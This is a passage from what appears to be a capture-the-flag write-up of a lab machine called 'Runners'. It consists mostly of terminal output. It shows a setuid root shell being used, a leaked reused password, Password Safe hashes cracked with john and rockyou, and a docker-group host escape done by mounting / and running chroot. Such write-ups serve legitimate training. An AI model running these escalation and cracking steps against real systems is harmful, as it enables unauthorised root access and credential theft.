blog.sql  rootshell  tmp.rudLLA2neY
maria@30acf6ca1fb6:~$ /tmp/rootshell -p
rootshell-5.0# id
uid=1001(maria) gid=1001(maria) euid=0(root) groups=1001(maria)
At this point we already have root privileges.
rootshell-5.0# ls /root
TODO_LIST.txt
rootshell-5.0# cat /root/TODO_LIST.txt
1. Crear un script para automatizar los backups de la base de datos. (OK)
2. Cifrar las contraseñas de la base de datos. (OK)
3. Avisar a Ian para que cambie su contraseña, a ver si deja usar su famosa contraseña "iambatman" en todos lados. (Pendiente)
We obtained a new set of user credentials; only now do we really get onto the target machine itself, rather than the container.
Getting in here is still not enough; all that yields is user.txt.
ian@TheHackersLabs-Runners:~$ ls
user.txt
Then we noticed that there is another user, elliot, under /home.
ian@TheHackersLabs-Runners:/home/elliot$ ls -la
total 36
drwxr-xr-x 4 elliot elliot 4096 Nov 28  2024 .
drwxr-xr-x 4 root   root   4096 Nov 28  2024 ..
lrwxrwxrwx 1 root   root      9 Nov 28  2024 .bash_history -> /dev/null
-rw-r--r-- 1 elliot elliot  220 Mar 31  2024 .bash_logout
-rw-r--r-- 1 elliot elliot 3771 Mar 31  2024 .bashrc
drwx------ 3 elliot elliot 4096 Nov 28  2024 .cache
-rw------- 1 elliot elliot   20 Nov 27  2024 .lesshst
-rw-r--r-- 1 elliot elliot  904 Nov 28  2024 miscredenciales.psafe3
-rw-r--r-- 1 elliot elliot  807 Mar 31  2024 .profile
drwx------ 2 elliot elliot 4096 Nov 27  2024 .ssh
(base) yolo@yolo:~/Desktop/timu/test$ psafe2john miscredenciales.psafe3 > psafe.hash
(base) yolo@yolo:~/Desktop/timu/test$ john --wordlist=/snap/seclists/rockyou.txt psafe.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
metallica        (miscredencial)
1g 0:00:00:00 DONE (2025-11-24 18:54) 12.50g/s 51200p/s 51200c/s 51200C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed
elliot@TheHackersLabs-Runners:~$ id
uid=1000(elliot) gid=1000(elliot) groups=1000(elliot),46(plugdev),110(docker)
elliot@TheHackersLabs-Runners:~$ docker ps
CONTAINER ID   IMAGE       COMMAND       CREATED         STATUS             PORTS                                                                      NAMES
30acf6ca1fb6   root_blog   "/start.sh"   12 months ago   Up About an hour   0.0.0.0:80->80/tcp, :::80->80/tcp, 0.0.0.0:2222->22/tcp, :::2222->22/tcp   ubuntu_blog
elliot@TheHackersLabs-Runners:~$ docker run -v /:/mnt --rm -it root_blog chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root)
docker run -v /:/mnt --rm -it root_blog chroot /mnt sh